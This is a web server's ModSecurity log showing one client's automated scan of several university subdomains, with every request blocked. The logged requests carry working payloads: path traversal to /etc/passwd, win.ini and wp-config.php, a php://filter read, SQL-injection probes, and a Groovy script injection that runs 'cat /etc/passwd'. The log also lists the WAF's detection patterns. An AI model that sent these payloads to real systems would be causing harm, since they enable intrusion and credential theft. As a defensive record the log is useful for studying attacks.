[Tue Aug 29 11:47:52.632360 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14eMCo-f0AAAkdu4YAAAAO"]
[Tue Aug 29 11:47:53.367123 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14ecCo-f0AAAkNPpMAAAAI"]
[Tue Aug 29 11:47:53.389347 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjtc5cAAAAX"]
[Tue Aug 29 11:47:53.389426 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjM7HkAAAAT"]
[Tue Aug 29 11:47:53.392885 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ecCo-f0AAAkNPpQAAAAI"]
[Tue Aug 29 11:47:53.416393 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "www.unla.ac.id"] [uri "/_search"] [unique_id "ZO14ecCo-f0AAAj11@wAAAAa"]
[Tue Aug 29 11:47:53.434874 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAkNPpYAAAAI"]
[Tue Aug 29 11:47:53.435086 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAhT4D0AAAAD"]
[Tue Aug 29 11:47:53.441858 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAkGCUYAAAAE"]
[Tue Aug 29 11:47:54.377331 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14esCo-f0AAAkaC-IAAAAJ"]
[Tue Aug 29 11:47:54.405493 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14esCo-f0AAAhl0MsAAAAi"]
[Tue Aug 29 11:47:54.436990 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14esCo-f0AAAjtc5sAAAAX"]
[Tue Aug 29 11:47:55.369645 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14e8Co-f0AAAj11-AAAAAa"]
[Tue Aug 29 11:47:56.394763 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAkGCU8AAAAE"]
[Tue Aug 29 11:47:56.400275 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAjM7IIAAAAT"]
[Tue Aug 29 11:47:56.415502 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAkNPqAAAAAI"]
[Tue Aug 29 11:47:56.439521 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAkNPqEAAAAI"]
[Tue Aug 29 11:47:56.505746 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAjM7IYAAAAT"]
[Tue Aug 29 11:47:57.364278 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAhl0NIAAAAi"]
[Tue Aug 29 11:47:57.402717 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAkNPqYAAAAI"]
[Tue Aug 29 11:47:57.408681 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAkaC-wAAAAJ"]
[Tue Aug 29 11:47:57.425286 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAkdu5cAAAAO"]
[Tue Aug 29 11:47:57.459845 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAhui-cAAAAr"]
[Tue Aug 29 11:47:58.404982 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAi2yMIAAAAN"]
[Tue Aug 29 11:47:58.405272 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAjCbNEAAAAB"]
[Tue Aug 29 11:47:58.431676 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAkGCVQAAAAE"]
[Tue Aug 29 11:47:58.434809 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAjy52UAAAAG"]
[Tue Aug 29 11:47:58.434845 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAjbw4kAAAAW"]
[Tue Aug 29 11:47:58.463801 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjy52YAAAAG"]
[Tue Aug 29 11:47:58.480352 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjqDGQAAAAH"]
[Tue Aug 29 11:47:58.483810 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjy52cAAAAG"]
[Tue Aug 29 11:47:58.484677 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAkNPq0AAAAI"]
[Tue Aug 29 11:47:58.485382 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAkaDAMAAAAJ"]
[Tue Aug 29 11:47:58.492846 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fsCo-f0AAAi2yMUAAAAN"]
[Tue Aug 29 11:47:58.514932 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fsCo-f0AAAi2yMYAAAAN"]
[Tue Aug 29 11:47:59.355445 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkGCVcAAAAE"]
